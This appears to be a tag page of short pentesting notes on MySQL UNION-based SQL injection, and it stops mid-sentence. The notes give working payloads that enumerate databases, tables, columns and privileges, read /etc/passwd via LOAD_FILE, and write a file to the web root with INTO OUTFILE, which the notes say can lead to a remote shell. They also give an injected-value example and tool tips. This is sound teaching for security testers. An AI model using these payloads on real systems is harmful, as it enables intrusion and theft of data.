Posts tagged: #Sql-Injection

Using a UNION injection we can find out about a (MySQL/MariaDB) structure.

Here are some minimal examples. Remember to determine the correct number of columns 🌿 and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.

Databases

UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;

Tables

UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;

Columns

UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Privileges

UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES

References

• How to determine the number of columns for union SQL injection 🌿

After enumerating user privileges 🌿 if you find one which has FILE you can use that to read files from the target.

UNION SELECT LOAD_FILE('/etc/passwd')

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿
• Writing files with MySQL 🌱

Tools

• sqlmap ↗️ has a --proxy flag

Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!

Techniques

• Writing files with MySQL 🌱
• Reading files with MySQL 🌱
• How to determine the number of columns for union SQL injection 🌿
• Enumerating database tables and columns with SQL injection 🌿

Prerequisites

This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.

secure_file_priv ↗️ can have the following values:

• null: cannot write anywhere on system
• "" (empty string): can write anywhere
• "/path/to/dir": can write only to specified path

SHOW VARIABLES LIKE 'secure_file_priv';

You can get this by querying the information_schema using a union injection

UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES 

Do it

SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿

A union injection causes additional rows to be added to the result set by using the UNION clause. To do this, we need to know the number of columns in the target result set.

There are two easy strategies for this. Using order by or union. Assume that the following is vulnerable:

SELECT * from users where username='$oops'

order by

In MySQL you can use numeric arguments for order by which you can use to infer the number of columns. Let $oops = "test' order by 1 -- then the query becomes: